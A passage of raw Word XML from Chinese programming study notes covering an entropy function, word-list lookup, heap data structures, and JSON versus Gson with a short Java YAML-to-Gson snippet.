        </w:rPr>
        <w:tab/>
        <w:t>entropy -= freq * math.Log2(freq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A6519B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04955DB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7138BDA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return entropy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D05B6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C50416F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DEB1B31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="771" w:name="_Toc159780194"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜词</w:t>
      </w:r>
      <w:bookmarkEnd w:id="771"/>
    </w:p>
    <w:p w14:paraId="0F7ECE71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://stackoverflow.com/questions/3788870/how-to-check-if-a-word-is-an-english-word-with-python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC27BE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>据该链接说明，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/dict </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本上有绝大部分的单词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617FEE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="772" w:name="_Toc159780195"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆的数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="772"/>
    </w:p>
    <w:p w14:paraId="719A76F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://blog.csdn.net/xiaomucgwlmx/article/details/103522410</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD2275C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123CE198" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(Heap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆的建立、插入、删除、最大堆、最小堆、堆排序等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A750A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="773" w:name="_Toc159780196"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二叉树</w:t>
      </w:r>
      <w:bookmarkEnd w:id="773"/>
    </w:p>
    <w:p w14:paraId="61CDAE45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、完全二叉树：若二叉树的深度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则除第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>层外，其他层的结点全部达到最大值，且第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>层的所有结点都集中在左子树。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA36F39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、满二叉树：满二叉树是一种特殊的的完全二叉树，所有层的结点都是最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEEB599" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="774" w:name="_Toc159780197"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="774"/>
    </w:p>
    <w:p w14:paraId="12B98AE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆（英语：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>heap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是计算机科学中一类特殊的数据结构的统称。堆通常是一个可以被看做一棵树的数组对象。堆总是满足下列性质：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731244A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆中某个节点的值总是不大于或不小于其父节点的值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE00C11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆总是一棵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>完全二叉树</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143B9C8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将根节点最大的堆叫做最大堆或大根堆，根节点最小的堆叫做最小堆或小根堆。常见的堆有二叉堆、斐波那契堆等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1A5CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7204AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>非线性数据结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，相当于一维数组，有两个直接后继。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A804C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6088AB77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>堆的定义如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个元素的序列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{k1,k2,ki,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,kn}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当且仅当满足下关系时，称之为堆。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626D57C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD8ED68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(ki &lt;= k2i,ki &lt;= k2i+1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(ki &gt;= k2i,ki &gt;= k2i+1), (i = 1,2,3,4...n/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F189641" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4935E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若将和此次序列对应的一维数组（即以一维数组作此序列的存储结构）看成是一个完全二叉树，则堆的含义表明，完全二叉树中所有非终端结点的值均不大于（或不小于）其左、右孩子结点的值。由此，若序列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{k1,k2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,kn}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是堆，则堆顶元素（或完全二叉树的根）必为序列中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个元素的最小值（或最大值）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA57CD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在二叉树中，若当前节点的下标为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则其父节点的下标为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其左子节点的下标为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i*2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其右子节点的下标为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i*2+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B223AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440FCE89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="775" w:name="_Toc159780198"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="775"/>
    </w:p>
    <w:p w14:paraId="2D732F11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.51cto.com/hanxiaoya/1352437</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E17C16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03623AD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种数据格式，便于数据传输、存储、交换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A777A88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种组件库，可以把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象数据转换成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A490FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385B3518" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APIKit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10A4E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91DFF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试是否是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是则转为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A0895" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Yaml yaml = new Yaml(new SafeConstructor());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25380DBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Object result = yaml.load(resp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72736AFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Gson gson = new GsonBuilder().create();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DC649E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>element = gson.toJsonTree(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320CF337" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB5B73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5015C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A606CAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者参考另一个代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30360C94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248D5A8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package com.wangyan.test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD732A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import com.google.gson.Gson;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE23CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class JsonTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50705D18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B03199" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
